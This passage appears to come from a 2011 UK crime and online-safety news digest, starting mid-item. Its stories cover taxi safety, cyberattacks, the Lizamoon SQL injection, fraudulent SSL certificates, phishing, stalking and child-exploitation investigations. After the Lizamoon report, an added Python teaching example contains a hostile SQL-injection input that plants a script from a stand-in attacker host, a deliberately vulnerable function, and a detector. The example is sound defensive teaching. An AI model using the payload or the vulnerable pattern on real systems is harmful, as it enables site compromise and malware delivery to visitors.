Sussex Police spokesperson: "This is the first time we have used the CEOP and Crimestoppers sites and we hope it will help find Kenneth Parker and his brother".

Detective Chief Inspector Nigel Jones from Warwickshire Police said: "The Child Exploitation and Online Protection (CEOP) Centre have an excellent record for locating convicted offenders and we are grateful for their support. We have done everything we can to locate Thomas Anthony Parker, a convicted high risk child sex offender and the next step is to work with international agencies, like CEOP, to appeal to the public throughout Europe to contact Crimestoppers anonymously on 0800 555 111 if you have information on either twin."

(4th April 2011)


 

THE MARKINGS ON A TAXI DON'T MEAN A THING
(The Independent on Sunday, dated 27th March 2011 author Kay Guest)
www.independent.co.uk
Category : personal safety

Women in cabs need to trust the driver, not the livery

"If your minicab's not booked, it's just a stranger's car," read the posters with the image of the deserted car park. "Ten sexual assaults are committed by illegal cab drivers in London every month," say the TV ads so scary that they have a 15 certificate. We've all seen the campaigns, which are sponsored by the police. We know not to get into a cab that we didn't pre-book. We look out for the "distinctive licence discs" displayed in the windows.
Our hearts sank, then, when police who were looking for the missing Swindon woman, Sian O'Callaghan, whose body has now been found in Gloucestershire, called for sightings of a green Toyota Avensis "with taxi markings".

Police have become more sensitive about the way that they talk to women about crimes that affect us. They steer clear of telling us that if there's a dangerous rapist on the streets we must all stay at home. They finally seem to understand that it's not women who are to blame. But they find it harder to explain how we should stay safe. They probably haven't had to try finding a cab late at night when it's raining.

A couple of years ago, a scam was discovered whereby drivers were registering their cars as private hire vehicles in order to avoid paying the London congestion charge. For an £82 registration fee, followed by £27 a year, any clever driver could have that all-important Transport for London (TfL) roundel stuck to his windscreens, front and back.

When I called TfL on Friday to ask what's being done about this, I was reassured that "All private hire vehicles must pass an annual inspection... two MOT tests each year [and] a rigorous annual safety check", and that "all individuals applying to become a licensed taxi or private hire driver have to undergo an enhanced Criminal Records Bureau [CRB] check", among other things. But these rigorous checks are separate for driver and car. It seems that any old rapist can buy a TfL sticker.

That doesn't alter the fact that nobody should get into a cab that isn't pre-booked. But it's not always as simple as TfL would like. I've got into a car that I found outside a locked-up local minicab office, whose driver told me, "Of course I work here: I've got the TfL sticker to prove it." I've had a cabbie refuse to confirm the name under which I'd booked and pre-paid. "You have to tell me your name," he said, "otherwise any stranger might jump in my cab and get a free lift home."

I asked him why any stranger would want a free lift to my house at 2am, at which point he told me to get out.

I've also called a cab to pick me up in a minor red-light district. The minicab office couldn't tell me my driver's car model, make, or licence number, leaving me to peer into every car with a male driver that slowed down. I found the cab eventually, but I wouldn't recommend this practice.

The London cab firm Addison Lee is particularly successful with women because it sends a text upon booking describing the car in detail and giving the driver's mobile phone number. But Addison Lee is not always available, even in London.

You can receive three registered cab firm numbers by texting "CAB" to 60835, says TfL, which also gives the following advice:

- Never approach a minicab on the street or accept the offer of a ride; the drivers are acting illegally. Only black cabs can pick passengers up on the street.

- Always book, so that there is a record of your journey.

- When your booked cab arrives, check it's for you and sit in the back. It's not always easy, but it is important.

- And most important of all is to remember that "taxi markings" mean nothing.

(4th April 2011)


 

RECLAIM OUR STREETS FROM THUGS, SAYS BARONESS
(SKY NEWS AND ANANOVA, dated 30th March 2011 no author quoted)
www.orange.co.uk and http://news.sky.com/skynews

Communities champion Baroness Newlove has called on members of the public to "reclaim their streets" in the fight against anti-social behaviour.

The widow of murdered father-of-three Garry Newlove said she wanted a new approach to neighbourhood crime that saw local people being given more power on their own streets.

Lady Newlove wrote in her first report as the Government's Champion for Active, Safer Communities, a role to which she was appointed last October, that she "wanted to make sure something positive" came out of the death of her husband.

Mr Newlove was 47 when he was kicked to death by a gang of teenagers outside his home in Warrington, Cheshire.

Working as an ambassador against anti-social behaviour, Lady Newlove has toured the UK in the past six months speaking to people about how best to tackle neighbourhood crime.

One of her recommendations is a scheme called Bling Back, which would see drug dealers' assets sold and the profits given back into communities where locals have provided police with information leading to convictions.

She also called for council tax rebates, or vouchers to spend on local services, to be given to those who take an active role in making their neighbourhood safer.
Lady Newlove said: "For too long now, too many people have either not known how to get involved, have not been listened to when they have tried to speak out, or simply felt that it wasn't worth it as nothing would ever change.

"This report sets out how we can change things by empowering local communities to reclaim their streets.

"Everyone has a role to play. Communities must begin to take more responsibility and local agencies must begin to lessen their grip on the decision-making process and trust the people they serve to solve problems for themselves."

Other recommendations include communities being given the power to set local speed limits, and the recently introduced crime maps being expanded so that people can use them to report crime and anti-social behaviour.

Writing in the foreword to the report, Our Vision For Safe And Active Communities, Lady Newlove said she had personally "suffered the devastating consequences of crime, disorder and unchallenged 'anti-social behaviour'".

During her time campaigning and gathering information for the report, Lady Newlove said she had seen many examples of the "people power" that could help "reclaim our communities".

She called for people to work together, adding: "To cynics who may be saying 'Here we go again, another set of recommendations, another report to gather dust', I'd like them to remember the spirit that sustained, then rebuilt this shattered country during and after the war."

Minister for crime prevention James Brokenshire said: "Since her appointment, Baroness Newlove has been working tirelessly to inspire, challenge, support and learn from areas across the country.

"I look forward to seeing how her report will help to shape how we approach community activism in the future."

Assistant Chief Constable Stuart Donald, the Association of Chief Police Officers spokesman on neighbourhood policing, said: "The police accept the challenge to build on the success of neighbourhood policing and recognise they have an important role in many of the recommendations being made."




Additional information

Baroness Newlove's recommendations for local areas to take forward include:

- 'Community Reward' - where information provided by the community leads to a conviction the community is given a reward to spend on crime prevention work.

- 'Bling Back' - where money made from selling local drug dealers' assets is handed back to the neighbourhood they blighted.

- letting communities set their own local speed limits.

- taking crime maps to the next level so people can use them to report crime and ASB and agencies can publish details of what action was taken against offenders.

- giving the public a single point of contact through the roll out of the 101 number to report ASB.

- providing council tax rebates, or vouchers for local businesses and services, for people who take part in activism.

- asking Police and Crime Commissioners to commit at least one per cent of their budget to grass roots community groups to use or have a say on.

The 60 page pdf report can be obtained from :

http://www.homeoffice.gov.uk/publications/crime/baroness-newlove-report

(4th April 2011)


EUROPEAN COMMISSION HIT BY CYBERATTACK
(IDG News Service, dated 24th March author Jennifer Baker)
www.idg.com
category : cyberattack

 

IDG News Service - The European Commission, including the body's diplomatic arm, has been hit by what officials said Thursday was a serious cyberattack.

The attack was first detected on Tuesday and commission sources have said that it was sustained and targeted.

External access to the commission's e-mail and intranet has been suspended and staff have been told to change their passwords in order to prevent the "disclosure of unauthorized information," according to an internal memo to staff. Staff at the commission, the European Union's executive and regulatory body, have also been told to send sensitive information via secure e-mail.

The event came just days ahead of the European Council summit being held on Thursday and Friday. The summit brings together the leaders of E.U. member states and crucial decisions will be made on economic strategy, the war in Libya and the future structure of the E.U.

This led to early speculation that the source of the attacks may be Libya, but the commission was quick to rule this out. The attack is thought to be similar to the cyberattack on the French government in the run up to the G20 Summit in February 2010. That assault involved malware and targeted e-mail, with some of the related stolen information redirected to China.

Commission administration spokesman Antony Gravili said officials would not speculate on the source of the attacks in such a sensitive security matter. He did, however, confirm that the attackers targeted the information of some commission officials, in particular at the External Action Service, the body's foreign diplomatic arm.

"We are already taking urgent measures to tackle this. An inquiry's been launched. This isn't unusual as the Commission is frequently targeted," said Gravili. He added that there was no concrete evidence that the attack is linked to the E.U. summit.

(4th April 2011)


 

MYSTERIOUS FACEBOOK WEB SEARCH BOX COULD BE MALWARE
(IDG News Service, dated 25th March 2011 author Juan Carlos Perez)
www.idg.com
Category : malware


A Web search box some users are seeing on their Facebook interface wasn't inserted by Facebook and could be the result of malware or a rogue browser plug-in or application.

AllFacebook, a blog devoted to Facebook-related news, first reported that a second search box had begun to appear on Facebook interfaces, right next to the legitimate site search bar.

The mysterious Web search box appeared perfectly integrated into the Facebook page layout, as if it were a native Facebook feature. However, Facebook is now saying that it didn't put that second search box there and that it could be a sign of malware infection.

"We are not testing the placement of a separate web search field and have no plans to do so. We believe the second search field or 'Search the Web' box appeared on people's accounts as the result of unknown actions by a third party targeting the browser -- potentially a browser plugin or malware -- unrelated to Facebook," a Facebook official told technology news blog Search Engine Land.

As Facebook members, users who think they might be affected by this situation have access to a free, browser-based virus scanning tool from McAfee, according to the company.

As the most popular social network and one of the world's largest sites, Facebook is in a constant battle against malicious hackers and online scammers who want to take advantage of its massive user base to commit fraud and spread malware.

At this point, it's not clear whether the sinister search box is the result of an external malware exploit or the work of a rogue Facebook application.

(4th April 2011)


 

TRIPADVISOR SAYS EMAIL LIST OF MEMBERS STOLEN
(Network World, dated 24th March 2011 author Ellen Messmer)
www.networkworld.com
Category : spam phishing


The online travel community TripAdvisor on Thursday informed its members that an unspecified portion of the TripAdvisor email list of its membership was stolen in an attack on a vulnerability in its system.

The result is that TripAdvisor members should be aware they may receive some type of spam, the company said, adding that the incident is still under investigation.

The notification to TripAdvisor members went out in an email from co-founder and CEO Steve Kaufer, who wrote, "We're taking this incident very seriously and are actively pursuing the matter with law enforcement. The reason we are going directly to you with this news is that we think it's the right thing to do."

TripAdvisor declined to provide further detail about the number of members involved, but said it has fixed the "source of the vulnerability and shut it down." The company noted it doesn't collect credit card or financial information, and does not sell or rent its member list. The company also believes that despite the data-breach incident, member passwords "remain secure."

(4th April 2011)


 

HIT IN MASSIVE WEB ATTACK
(BBC News, dated 1st April 2011)
www.bbc.co.uk

Hundreds of thousands of websites appear to have been compromised by a massive cyber attack.

The hi-tech criminals used a well-known attack vector that exploits security loopholes on other sites to insert a link to their website.

Those visiting the criminals' webpage were told that their machines were infected with many different viruses.

Swift action by security researchers has managed to get the sites offering the sham software shut down.

Code control
 
Security firm Websense has been tracking the attack since it started on 29 March. The initial count of compromised sites was 28,000 sites but this has grown to encompass many times this number as the attack has rolled on.

Websense dubbed it the Lizamoon attack because that was the name of the first domain to which victims were re-directed. The fake software is called the Windows Stability Center.

The re-directions were carried out by what is known as an SQL injection attack. This succeeded because many servers keeping websites running do not filter the text being sent to them by web applications.

By formatting the text correctly it is possible to conceal instructions in it that are then injected into the databases these servers are running. In this case the injection meant a particular domain appeared as a re-direction link on webpages served up to visitors.

Early reports suggested that the attackers were hitting sites using Microsoft SQL Server 2003 and 2005 and it is thought that weaknesses in associated web application software are proving vulnerable.

Ongoing analysis of the attack reveals that the attackers managed to inject code to display links to 21 separate domains. The exact number of sites hit by the attack is hard to judge but a Google search for the attackers' domains shows more than three million weblinks are displaying them.

Security experts say it is the most successful SQL injection attack ever seen.

Generally, the sites being hit are small businesses, community groups, sports teams and many other mid-tier organisations.

Currently the re-directs are not working because the sites peddling the bogus software have been shut down.

Also hit were some web links connected with Apple's iTunes service. However, wrote Websense security researcher Patrick Runald on the firm's blog, this did not mean people were being redirected to the bogus software sites.

"The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer," he wrote.

(4th April 2011)
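
The failure described in the web attack report above, and the two defences it touches on (treating submitted text as data, and encoding markup on output as the iTunes pages did), shown as an added example that is not part of the BBC article. The table, the function names and the attacker.invalid domain are constructed for illustration, and Python's built-in sqlite3 stands in for the Microsoft SQL Server sites the article mentions.

```python
import html
import re
import sqlite3

# Constructed hostile input. attacker.invalid is a placeholder domain, and the
# trailing quote and "--" are what turn the text into part of the statement.
HOSTILE_TITLE = 'Home<script src="http://attacker.invalid/ur.php"></script>\' --'

# Matches a script tag that loads code from another host and captures the host.
SCRIPT_SRC = re.compile(
    r"<script[^>]*\bsrc\s*=\s*[\"']?(?:https?:)?//([^/\"'\s>]+)", re.IGNORECASE)


def make_db():
    """Constructed sample data: a small club site with three page titles."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO pages (id, title) VALUES (?, ?)",
                     [(1, "Home"), (2, "Fixtures"), (3, "Contact us")])
    return conn


def rename_page_unfiltered(conn, page_id, new_title):
    """Unfiltered: submitted text is pasted into the SQL statement itself."""
    sql = ("UPDATE pages SET title = '" + new_title +
           "' WHERE id = " + str(int(page_id)))
    return conn.execute(sql).rowcount  # number of rows the statement changed


def rename_page_parameterised(conn, page_id, new_title):
    """Hardened: the text travels as a bound value and is never parsed as SQL."""
    sql = "UPDATE pages SET title = ? WHERE id = ?"
    return conn.execute(sql, (new_title, page_id)).rowcount


def find_injected(conn, allowed_hosts=()):
    """Defender's check: list (page id, host) for script tags in stored text."""
    hits = []
    for page_id, title in conn.execute("SELECT id, title FROM pages ORDER BY id"):
        for host in SCRIPT_SRC.findall(title or ""):
            if host.lower() not in allowed_hosts:
                hits.append((page_id, host.lower()))
    return hits


def render_title(title):
    """Output encoding: markup in stored text is shown as text, not executed."""
    return "<h1>" + html.escape(title) + "</h1>"


def compare():
    """Send the same hostile text through both versions and report the damage."""
    unfiltered, hardened = make_db(), make_db()
    return {
        "unfiltered_rows_changed": rename_page_unfiltered(unfiltered, 1, HOSTILE_TITLE),
        "unfiltered_hits": find_injected(unfiltered),
        "hardened_rows_changed": rename_page_parameterised(hardened, 1, HOSTILE_TITLE),
        "hardened_hits": find_injected(hardened),
        "hardened_rendered": render_title(
            hardened.execute("SELECT title FROM pages WHERE id = 1").fetchone()[0]),
    }


if __name__ == "__main__":
    for key, value in compare().items():
        print(key, "=", value)
```

The hardened run still stores the markup in the one row it was asked to change, which is why output encoding is needed alongside bound parameters.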


 

WHO IS USING YOUR INTERNET ACCESS ?

The following article describes a crime where an individual stole products from a US company by stealing people's identities. Not only that, he almost got some of his UK neighbours arrested as he used their Broadband WiFi access to commit the online crime.

Moral of the tale : Protect yourself !

- Change your computer passwords regularly at work and home.
- Ensure that your home WiFi has security level WPA or higher (ie. your computer "speaks" to your router only after an exchange of an exclusive password).

HACKER JAILED OVER VIRTUAL GAMING CHIPS SCAM
(Guardian, dated 18th March author Steven Morris)
www.guardian.co.uk

A British computer hacker who stole 400bn virtual gaming chips from an international gaming company has been jailed for two years.

Ashley Mitchell, 29, broke into the Zynga mainframe, stole the identity of two employees and transferred chips said to be worth more than £7m to himself.

Mitchell, of Paignton, Devon, sold the chips through Facebook to other gaming enthusiasts and used the money to fund his online gambling addiction.

More than 50 million people a day play Zynga games, including Mafia Wars, in which players run a virtual mob business, and FarmVille, which allows users to create their dream farm. Players have to buy chips for their virtual worlds. A black market in cut-price chips has grown up on the internet.

Mitchell, a former council accounts clerk, made £53,612 in two months after selling about a third of the chips.

But James Taghdissian, prosecuting, told Exeter crown court that Zynga put its loss at $12m (£7m). "That is what they estimate they would have lost if all the chips were successfully sold on," he said.

He said the company became aware in August 2009 that large amounts of chips were vanishing and suspected the two employees whose identities Mitchell had adopted. However, investigators then realised the system had been hacked and narrowed the search to Paignton. Mitchell's neighbours had their computers seized because he was "piggy-backing" on their unsecured Wi-Fi connections. Mitchell was eventually identified because he used his own Facebook profile during one of his attempts to hack into the system.

Taghdissian said: "It was clear there had been a systematic approach adopted in probing and accessing Zynga. Checks on [Mitchell's] bank account showed at this time he bought items including a Rolex watch and was also spending money on online gambling."

"He made determined and repeated efforts to attack Zynga's systems. He succeeded and transferred 400bn chips and sold them to realise a substantial profit."

Ben Darby, defending, said the loss to Zynga was impossible to quantify because the chips were virtual and the company could create as many as it wants.

He said Mitchell had enjoyed little benefit and spent most of the proceeds on online gambling on other sites that use real money.

He said: "Gambling had complete control of his life." He said his client was now an internet entrepreneur with his own Facebook poker site called Gambino, which could earn him more than £100,000 a year.

Mitchell admitted computer misuse and four counts of money laundering and asked for 41 similar cases to be considered. He was also sentenced to 30 weeks for breaching a 40-week suspended sentence imposed in 2008 for hacking into the computer system of Torbay council, where he once worked.

Judge Philip Wassall told him: "The dishonesty in this case was substantial and protracted. Online security is a priority for everyone these days.

"You deprived Zynga of income. It is quite clear you used a considerable degree of expertise and persistence to hack into the system.

"It is a considerable aggravating feature that someone hacks into systems in this way when so much business and personal finance is done using electronic means.

"From internet banking to major international transactions, people rely on the security of systems and anyone who comes before the courts who has gone through these security systems for their own ends can expect custody.

"The sentence has to reflect the impact on public confidence in security systems and online business when someone breaches security in this way."

(26th March 2011)



IRAN LINKED TO ATTACK, FRAUDULENT SSL CERTS, TARGETING GOOGLE, SKYPE, YAHOO
(Computer World, dated 23rd March 2011 author Darlene Storm)
www.computerworld.com

 

The following is an extract of an article. For the full article go to :
http://cwonline.computerworld.com/t/7261493/753476122/377070/0/

The majority of users probably feel safe upon seeing the padlock on their browser window which would seem to indicate it's secure and safe to communicate with an e-mail account or a bank. While SSL is better than nothing, we also know it certainly does not stop man-in-the-middle (MITM) attacks. More or less, we trust our browsers to silently accept trustworthy digital certificates from a Certificate Authority (CA) so that we can trust that a site to which we surfed is the authentic and actual site. But with compromised CAs, the cyberthugs behind the rogue certificates can impersonate the HTTPS traffic for those sites. Think of how many people use Google, Skype, or Yahoo. This was big, folks!

It can be extremely involved to wrap your brain around Certificate Authorities (CA), how they work, and how the system is flawed. An attacker with fake certificates and access to a target's Internet connection can launch a MITM attack, thereby making it possible to eavesdrop, observing and/or recording all encrypted web traffic to the compromised site while the user is clueless to what is happening. Even if it's not your Big Brother, someone's Big Brother was in their browser and handing out certified lies. Thank goodness there are people like Jacob Appelbaum watching out for us to spot fraudulent CAs.

Security researcher and Tor ( note 1 ) developer Jacob Appelbaum did great investigating and then a wonderful write up on the Certificate Authorities (CA) compromise and near cover-up of several fraudulent certs. Appelbaum, also known as "ioerror" on Twitter, discovered the CA compromise in the wild. He writes, "Last week, a smoking gun came into sight: A Certification Authority appeared to be compromised in some capacity, and the attacker issued themselves valid HTTPS certificates for high-value web sites. With these certificates, the attacker could impersonate the identities of the victim web sites or other related systems, probably undetectably for the majority of users on the internet."

He contacted Google and Mozilla, but was held to an embargo about the disclosure. The compromised certificates were issued by USERTRUST Network which is part of Comodo. Google had patched its own browser Chrome last week and Mozilla managed to include the blacklist in Firefox 4 ( another browser ). When Mozilla blogged about the issue, so did Appelbaum - which included a detailed explanation as well as suspecting "this action was taken by a state level adversary."

After Comodo ( note 2 ) finally issued a statement, it confirmed that Appelbaum's suspicions were true. His update states that the CA compromise "was a targeted attack by a state level actor and they [Comodo] have named Iran as the country they suspect....In the details of their statement we have a confirmation that they have the ability to monitor and thus surveil people who wish to know if certificates are valid."

According to the Internet Storm Center SANS ( note 3 ), the targets included Microsoft's login.live.com, Google's mail.google.com, google.com, login.yahoo.com (3 certificates), login.skype.com, addons.mozilla.com, and "Global Trustee."

US-Cert (note 4 ) also posted a notification of the fraudulent SSL certificates and Microsoft released a security advisory about the fraudulent digital certificates which can allow spoofing. Before Comodo released a statement, there was speculation on Hacker News that it might be the Chinese government. Although the IPs were from an ISP in Iran, who can say for absolutely certain right now who it was, either the Iranian government or another state-sponsored actor trying to make it look like Iran?

As Appelbaum wrote, "Blocking specific serial numbers or relying on flawed, provably broken methods of revocation will simply not cut it anymore. When the actual protection mechanisms are not enforced, there is little hope of end users being protected....This should serve as a wake up call to the internet. We need to research, build, and share new methods for ensuring trust, identity, authenticity, and confidentiality on the internet....Certification Authorities may continue to provide a piece of the puzzle but it's high time we ensure that they're not the alpha and the omega, anymore."



Additional Information

 


WHAT IS SSL ?

SSL (Secure Sockets Layer) is the standard security technology for establishing an encrypted link between a web server and a browser (eg. Internet Explorer, Firefox, Chrome etc). This link ensures that all data passed between the web server and browsers remain private and integral. SSL is an industry standard and is used by millions of websites in the protection of their online transactions with their customers.

As a user all you normally need to be concerned about when you carry out a financial transaction online is that "http" is replaced by "https" and a padlock also appears in the URL Task bar.

WHAT IS - MAN-IN-THE-MIDDLE (MITM) ATTACK ?

When you go online and enter the name of a website, your browser checks out the website's facilities ( level of security etc ). If it is a secure website (ie. for banking etc ) information will be returned to your browser from the bank system about its security facilities (Certs or Certificates). As a result "https" and a padlock will be displayed to indicate that communication between you and the "bank" is encrypted (coded).

But, if the data link between your computer and the banking system is intercepted by a MITM, it is that bogus system that returns a "false certificate" that your computer reacts to. As you type in all of your banking details and passwords the bogus system copies them and then forwards the information to the bona fide banking system. As a user, you would not notice the interception as you would be able to carry out your transactions as normal.


Note

1. A group that believes in online anonymity ( www.torproject.org )
2. A company who deals with online security. ( www.comodo.com )
3. Internet Storm Center ( www.isc.sans.org ). They appear to be a voluntary group that helps monitor the internet for malicious activity (see http://isc.sans.edu/about.html)
4. US-Cert : United States Computer Emergency Readiness Team ( part of Homeland Security ) : www.us-cert.gov

(26th March 2011)


 

MORE NEWS FROM MY SPAM INBOX !
Category : phishing
 
Well, so far this month I haven't received the regular adverts for various forms of pharmaceutical paraphernalia. My Internet Service Provider's (ISP) spam filter has continued to do a very good job. In the last 2 weeks it has managed to filter out 7 phishing e-mails and place them in a "be warned" post box.

The latest batch of phishing e-mails includes :

Santander - Please update your banking details. Failure to do so will lead to online service suspension.

HSBC - Several attempts have been made to access your account, your account has been de-activated. Please supply your security information to re-activate. (nb. 2 received with different activity dates )

HSBC - You have an incoming payment. We are unable to process the payment as your details cannot be verified. To view the transaction and your current balance, please click on the link below.

Lloyds TSB - Due to our annual upgrade of Internet banking machineries we are currently engaged in customer information update. Click on the "Verify my Account" link.

HMRC - After the last annual calculation of your fiscal activity, we have determined that you are eligible to receive a tax refund of £468.50 GBP. Please click here to supply your banking information.

DHL ( Parcel Delivery Service ) - The parcel was send to your home address. And it will arrice within 7 bussness day. More information and the tracking number are attached in linked document. ( nb. There was a document attached to this e-mail - this was probably infected with malicious software ).

All of these e-mails are bogus and are just phishing for your personal information. If you receive them, delete them immediately and do not open any attachments. If you are suspicious about activity on your bank account, contact your bank direct using a known telephone number, NOT contact details within these bogus e-mails.

(26th March 2011)


STALKING : TRUST YOUR INSTINCT
(Police Oracle, dated 16th March 2011 author Karen Thomas)
www.policeoracle.com

 

Note : This article has been slightly modified. The embedded links from within have been placed at the base of the article.

A leading UK charity has today launched a campaign to increase the awareness of stalking and encourage potential victims to come forward and report the behaviour to the police.

The Network for Surviving Stalking (NSS) is asking people to Trust Your Instinct in identifying the behaviours exhibited by stalkers and to take the menacing nature of the offence seriously.

Police and professionals from the wider policing family have welcomed the move to empower victims to help officers investigate a crime that can be difficult to identify and address.

Jacqui Hames, former detective constable with the Met and BBC Crimewatch presenter, collaborated on developing a quiz (see below) to help victims differentiate between 'creepy' behaviour and stalking.

Officers can access a second version of the checklist (see below) that explains the reasoning and research behind each question, which Ms Hames hopes will prove useful should someone approach the police for help.

"Victims often don't understand what they are experiencing, so it is recognising what you are dealing with, listening to the victim and being that beacon of safety.

"A police officer's job is just as much about crime prevention as it is about detecting major crime. It is having an understanding of the behaviours, which could be the start of something serious, and knowing what you can do to stop it escalating."

According to the 2006 British Crime Survey, more than one million women and 900,000 men report being stalked every year.

Experts agree that seemingly inoffensive gestures are not crimes in themselves but, collectively and when sustained over time, they constitute a course of conduct considered an offence under the 1997 Protection from Harassment Act.

In some cases, the behaviour escalates into rape and murder, yet current research shows that 77 per cent of victims wait until they have endured more than 100 contacts before they will consider taking action.

Alexis Bowater, Chief Executive of the NSS, was emphatic when describing stalking as a form of psychological terrorism, in which every victim has their life stolen from them.

"This has been a secret, hidden crime for too long. Stalkers cloak their victims in a coat of isolation, despair, darkness and depression and make them think there is nobody to help them," she told PoliceOracle.com.

"Nowhere else in society would you accept a person being forced into a relationship. That is what stalking is all about."

Ms Bowater maintained that early intervention is key to tackling the offence.

"If victims can be empowered to come forward more quickly then that will be beneficial to not just the victims but to the officers investigating this crime.

"The stalking quiz is designed to help everybody."


 

Checklist (opens as a pdf) : http://www.policeoracle.com/Downloads/stalking_quiz_for_the_police.pdf

Quiz (opens as a pdf) : http://www.policeoracle.com/Downloads/stalking_quiz_for_the_public.pdf

"Trust your instinct" film : http://vimeo.com/20812847

Network for Surviving Stalking website : www.nss.org.uk/

Link to original article : http://www.policeoracle.com/news/Stalking:-Trust-Your-Instinct_31841.html

(19th March 2011)


 

TOO SMART TO BE STUNG BY AN E-MAIL SCAM ?
(The Times, dated 16th March 2011 author Tim Dickinson)
www.thetimes.co.uk

So was Tim Dickson, until criminals hacked into his e-mail account, spun a false yarn and began to rip off his friends

Like so many things in life, e-mail scams happen only to other people. The attempted frauds - such as the latest e-missive supposedly collecting cash donations for victims of the Japanese tsunami, on behalf of the Red Cross - are often so badly crafted that we can hardly believe anyone would fall for them. But no longer. I have just been the victim of one that should chill the blood of anyone with a "social" e-mail account.

This is how it worked. Someone, somewhere hacked into my account last month and sent a message in my name to just about everyone I know or have met in the past year, announcing that my bag, passport and credit cards had been stolen on a trip to Kuala Lumpur: I needed "quick funds" to catch the next flight home. The message offered to forward details of how to send the money (sum unspecified at this point) and provided an "alternate" e-mail address to which responses could be sent.

Implausible? It depends who you are. Most people quickly realised that I do not generally "reach out", I don't use plain "Hi" as a salutation, don't use American English spelling and don't sign myself "Timothy". On the other hand, there was just enough credibility in the way the e-mail was written and the circumstances - I do travel a bit - for a surprising number of people to "reach out" in reply.

What they didn't know was that the hacker had control of my e-mail account, had changed my password and altered my account settings to prevent me getting back in. He or she proceeded to impersonate me in several online conversations, quickly changing his sign-off to "Tim" and encouraging those at the other end to think that my situation was perilous and I needed financial help urgently (to the tune of £1,500). A telephone number was given, purporting to be that of the front desk of a well-known hotel in Kuala Lumpur.

On the strength of the e-mail exchanges and one or two snatched conversations with the Oscar-winning hotel porter, seven friends set out to make payments from nearby post offices or Western Union offices. Four rang my mobile phone just as they were about to move the funds, three went ahead and sent cash transfers (having had what they thought were bona fide e-mail exchanges), then rang me. You can imagine how I (and they) froze. Two dashed back to the counter to find that in one case they were just inside a 20-minute transaction "window", and in the other the crook (or his accomplice) had not yet picked up the cash from the designated Western Union office. Sadly, it was too late for the third, who transferred £2,000.

There were lighter moments in all this, not least the touching realisation that seven friends had responded to "my" plea for help and that many others would have done so. A gleeful call from our dear retired vicar, saying that he had stumped the villain by asking him to name three present or former churchwardens, made me smile. But on the whole, this is a depressing tale of corruption in our electronic age. Some cautionary points to remember:

Online "communities" may be far less safe than real ones.

Personal trust is cruelly exposed as blind foolishness. I now wonder what might happen if I did need rescuing in a far-flung part of the world one day.

"Accountability" seems to be lost in a moral maze. Who, ultimately, is responsible for that stolen money?

Corporations are not only increasingly faceless but voiceless. I have relished communications technology as a business writer and editor for 15 years, but last month I was suddenly trapped. Desperate to regain control of my account, I could find nothing but recorded messages in a frantic half-hour of phone calls around the world. I was unable to submit the relevant online form because (here's the Catch-22) the e-mail address and (old) password failed to match.

The law is impotent. I quickly rang the City of London fraud office but was told that a) until someone lost money there was no "victim", so no "crime", and b) "this sort of thing is increasingly common and there's not much that can be done. The guy could be anywhere".

I regained control of my account thanks only to the heroic efforts of the London-based PR advisers to the e-mail service provider, and the company's internal communications director. Without their help to convince the engineers that I was who I said I was, I don't know how much more damage the fraudster might have done. Even so, it was a full ten hours before I was able to start alerting my contacts.

My advice now is: check your settings and do all you can to improve your security: ensure that your password is as personal to you as possible, and never include password or bank details in any e-mails to family.

A broader responsibility lies with the corporations running personal and social e-mail to step up the fight against online fraud. Believe me, it's scary out there. And if some of the conversations I've had in the past few days are to be believed, it's getting scarier.

(19th March 2011)


 

"WORLD'S LARGEST PAEDOPHILE RING" UNCOVERED
(BBC News, dated 16th March 2011 author Dominic Casciani)
www.bbc.co.uk
Category : child abuse

International police led by a UK team say they shut down the largest internet paedophile ring yet discovered.

The global forum had 70,000 followers at its height, leading to 4,000 intelligence reports being sent to police across 30 countries.

The operation has so far identified 670 suspects and 230 abused children.

Detectives say 184 people have been arrested - 121 of them were in the UK. Some 60 children have been protected in the UK.

The three-year investigation, Operation Rescue, was led by investigators from the UK's Child Exploitation and Online Protection Centre (Ceop).

Speaking at a news conference at The Hague in the Netherlands, investigators said the network hid behind a legal online forum which operated out of the country - but its members came from around the world.

Along with the Netherlands and the UK, suspects have been identified in Australia, Italy, Canada, New Zealand and Thailand.

The members of the network went into a private channel, boylover.net, and then used its secret systems to share films and images of abused children, said Rob Wainwright, director of European police agency Europol.

However, child abuse investigators, including a team from Ceop, had already infiltrated the network and were posing as paedophiles to gather intelligence.

In the UK, the 240 suspects include police officers, teachers and a karate teacher. One of the suspects in the UK is a woman.

To date, 33 have been convicted, including John McMurdo, a scout leader from Plymouth. Another forum user was Stephen Palmer, 54, of Birkenhead, who shared abuse images with contacts in the US. A third man, 46-year-old Colin Hoey Brown of Bromsgrove, was jailed for making and distributing almost 1,000 images.

'New ground broken'
 
Peter Davies, head of Ceop, said: "The scale and success of Operation Rescue has broken new ground.

"Not only is it one of the largest operations of its kind to date - and the biggest operation we have led - it also demonstrates the impact of international law enforcement agencies working together with one single objective, to safeguard children and bring offenders to justice.

"While these offenders felt anonymous in some way because they were using the internet to communicate, the technology was actually being used against them.

"Everything they did online, everyone they talked to or anything they shared could and was tracked by following the digital footprint."

Operation Rescue began when Ceop and colleagues in the Australian Federal Police separately identified the site as a key online meeting place for abusers.

The two forces deployed officers to infiltrate the site and to identify the members who were posing the most risk to children.

One of the early breakthroughs in the investigation was the arrest of four suspects in Thailand in 2008. Two of the men were British.

In March of the same year, Ceop identified the owner of the site and the location of its server in the Netherlands. The owner of the server is now co-operating with Dutch police.

Rob Wainwright of Europol said the man running the server had used "advanced security techniques" which took months to break down.

"If you think you can use the internet to abuse children you are wrong," he said.

"We will not allow these offenders to carry on committing these awful crimes against young children. We will not rest until we have identified every offender that has been active in this network and others that might be operating on the internet."

(16th March 2011)


CEOP SECURES CONVICTIONS IN CAMBODIA
(Police Oracle, dated 14th March 2011 author Cliff Caswell)
www.policeoracle.com
Category : child abuse

 

Officers at the Child Exploitation and Online Protection Centre (CEOP) have said they are pleased after assisting Cambodian counterparts in investigations that took two British nationals involved in offences against children out of circulation.

Matthew Harland (38) and 53-year-old Nick Griffin are now starting prison sentences in the Asian country after the agency helped secure the two convictions in as many days.

Harland, wanted on suspicion of possessing child abuse images in the UK, will spend seven years behind bars. Griffin - who ran orphanages in a Cambodian tourist hotspot - is serving two years with one suspended for offences against children.

A statement from CEOP revealed how Harland had been arrested by Hampshire Police in December 2005 but had skipped bail and left the UK.

